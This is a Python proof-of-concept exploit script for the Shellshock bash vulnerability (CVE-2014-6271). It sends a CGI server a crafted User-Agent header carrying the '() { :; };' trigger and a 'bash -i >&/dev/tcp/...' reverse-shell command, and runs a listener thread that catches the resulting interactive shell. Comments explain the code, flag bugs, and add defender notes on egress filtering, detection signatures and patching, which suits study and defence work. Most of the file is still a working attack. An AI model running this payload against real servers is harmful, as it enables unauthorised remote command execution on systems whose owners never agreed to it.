import requests
import socket
import argparse
import subprocess
import sys
from requests import get
from requests.exceptions import ChunkedEncodingError
import threading
from time import sleep

# CVE-2014-6271 (Shellshock) POC exploit
# This script does a few things. First, it receives the required arguments from the user,
# including the target URL of the vulnerable CGI script, and the listening IP address and port for
# capturing the reverse shell. Then it creates a listening socket that will function as the actual reverse shell in the program.
# After that, it sends a GET request with a specially crafted User-Agent header that causes RCE on the server
# and sends the connection back to the listening socket, as a reverse shell.


# Receiving required arguments from the user:
def GetArguments():
    """Parse the command line and return ``(url, lhost, port)``.

    All three options are mandatory; ``argparse`` prints usage and exits
    when one is missing.  ``port`` arrives already converted to ``int``.
    """
    arg_parser = argparse.ArgumentParser(description="Shellshock Vulnerability exploit (cve-2014-6271)")
    mandatory = arg_parser.add_argument_group("required arguments")
    mandatory.add_argument(
        '-u', "--url", type=str, required=True,
        help='target url of cgi script (example: http://www.domain.com/cgi-bin/script.cgi)',
    )
    mandatory.add_argument(
        '-l', '--lhost', type=str, required=True,
        help='listening ip address for capturing the reverse shell',
    )
    mandatory.add_argument(
        '-p', "--port", type=int, required=True,
        help='listening port for capturing the reverse shell',
    )
    parsed = arg_parser.parse_args()
    return parsed.url, parsed.lhost, parsed.port

# Creating the listening socket that will function later as the reverse shell:
def reverse_shell():
    """Listen on the module-level ``lhost``/``port`` and relay an interactive session.

    ``lhost`` and ``port`` are not parameters: they are the globals assigned by
    the top-level script, so this must run after ``GetArguments()``.  Accepts a
    single TCP connection, then loops: print what the peer sent, read one line
    from stdin, forward it.  The only handled exit is ``KeyboardInterrupt``.

    Defender note: the connection this waits for is an outbound TCP connection
    from the web server to an operator-chosen host/port, so egress filtering
    on the server's network blocks this stage even if the injection succeeds.
    """
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.bind((lhost,port))
        s.listen(1)
        print("[*] listening on port: {0}...".format(port))
        conn,addr = s.accept()
        print("[*] received connection from {0}".format(addr))
        while True:
            # One recv of at most 2048 bytes per iteration; anything longer
            # only appears after the next line of input is sent.
            output=conn.recv(2048).decode()
            sys.stdout.write(output)
            cmd=input()+"\n"
            # NOTE: a newline was appended on the line above, so this can never
            # equal "exit"; the branch is effectively dead and a typed "exit"
            # is forwarded like any other line.
            if(cmd=="exit"):
                conn.close()
                s.close()
                break
            conn.send(cmd.encode())
            sleep(1)
            # ANSI "cursor up" escape, then redraw the last line of the previous
            # output so the prompt line stays in place.
            sys.stdout.write("\033[A"+output.split("\n")[-1])
            
    except KeyboardInterrupt:
        # NOTE(review): this runs in a worker thread (see the top-level script);
        # in CPython Ctrl-C is delivered to the main thread, so this handler is
        # unlikely to fire here.  If it did before accept() returned, ``conn``
        # would be unbound and the handler itself would raise NameError.
        conn.close()
        s.close()
        quit()
  
# Calling the functions "GetArguments" and "reverse_shell", and after
# that sending the GET request with the crafted User-Agent header:
try:
    # These become module-level globals; reverse_shell() reads lhost/port
    # from here rather than taking parameters.
    url,lhost,port = GetArguments()
    t = threading.Thread(target=reverse_shell, args=())
    t.start()
    # Fixed 2-second grace period for the listener thread to bind; there is
    # no handshake, so a slower bind simply means the request goes out first.
    sleep(2)
    #this is the part of crafting and sending the GET request:
    cmd="'bash -i >&/dev/tcp/{0}/{1} 0>&1'".format(lhost,port)
    # Detection/mitigation note: the "() { :; };" prefix is the Shellshock
    # (CVE-2014-6271) trigger that IDS/WAF signatures and access-log searches
    # key on in request headers; a patched bash on the server is the fix.
    user_agent= {"User-Agent":"() { :; };echo; echo; /bin/bash -c "+cmd}
    # No timeout is given, so the main thread blocks here until the server
    # responds or closes the connection.
    request=requests.get(url,headers=user_agent)
except ChunkedEncodingError:
    # Presumably raised when the CGI response is cut short by the injected
    # command; silently ignored rather than reported.  (TODO confirm)
    pass
except KeyboardInterrupt:
    quit()